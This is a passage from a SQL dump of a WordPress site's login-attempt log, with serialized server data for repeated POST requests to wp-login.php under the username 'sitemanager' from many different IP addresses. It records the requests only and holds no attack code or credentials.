Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35550\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.209.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745422806.7664981;s:12:\"REQUEST_TIME\";i:1745422806;}}','54.36.209.164',0,'2025-04-23 21:10:10','1970-01-01 00:00:00'),(93938,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44648\";s:11:\"REMOTE_ADDR\";s:13:\"187.33.241.37\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745423177.014375;s:12:\"REQUEST_TIME\";i:1745423177;}}','187.33.241.37',0,'2025-04-23 21:16:18','1970-01-01 00:00:00'),(93939,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35522\";s:11:\"REMOTE_ADDR\";s:15:\"158.106.136.182\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745423551.2976079;s:12:\"REQUEST_TIME\";i:1745423551;}}','158.106.136.182',0,'2025-04-23 21:22:33','1970-01-01 00:00:00'),(93940,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42026\";s:11:\"REMOTE_ADDR\";s:12:\"78.47.178.44\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745423919.9580059;s:12:\"REQUEST_TIME\";i:1745423919;}}','78.47.178.44',0,'2025-04-23 21:28:41','1970-01-01 00:00:00'),(93941,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50232\";s:11:\"REMOTE_ADDR\";s:12:\"195.20.19.31\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745424295.2619071;s:12:\"REQUEST_TIME\";i:1745424295;}}','195.20.19.31',0,'2025-04-23 21:34:57','1970-01-01 00:00:00'),(93942,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42676\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.119.106\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745424667.570154;s:12:\"REQUEST_TIME\";i:1745424667;}}','198.54.119.106',0,'2025-04-23 21:41:09','1970-01-01 00:00:00'),(93943,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48932\";s:11:\"REMOTE_ADDR\";s:12:\"162.0.232.11\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745425041.385092;s:12:\"REQUEST_TIME\";i:1745425041;}}','162.0.232.11',0,'2025-04-23 21:47:23','1970-01-01 00:00:00'),(93944,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59686\";s:11:\"REMOTE_ADDR\";s:15:\"111.229.111.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745425408.072207;s:12:\"REQUEST_TIME\";i:1745425408;}}','111.229.111.163',0,'2025-04-23 21:53:29','1970-01-01 00:00:00'),(93945,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53924\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745425781.8451321;s:12:\"REQUEST_TIME\";i:1745425781;}}','162.0.232.248',0,'2025-04-23 21:59:43','1970-01-01 00:00:00'),(93946,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52764\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.122.219\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745426151.355654;s:12:\"REQUEST_TIME\";i:1745426151;}}','68.65.122.219',0,'2025-04-23 22:05:53','1970-01-01 00:00:00'),(93947,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56712\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745426521.8562391;s:12:\"REQUEST_TIME\";i:1745426521;}}','103.169.35.190',0,'2025-04-23 22:12:03','1970-01-01 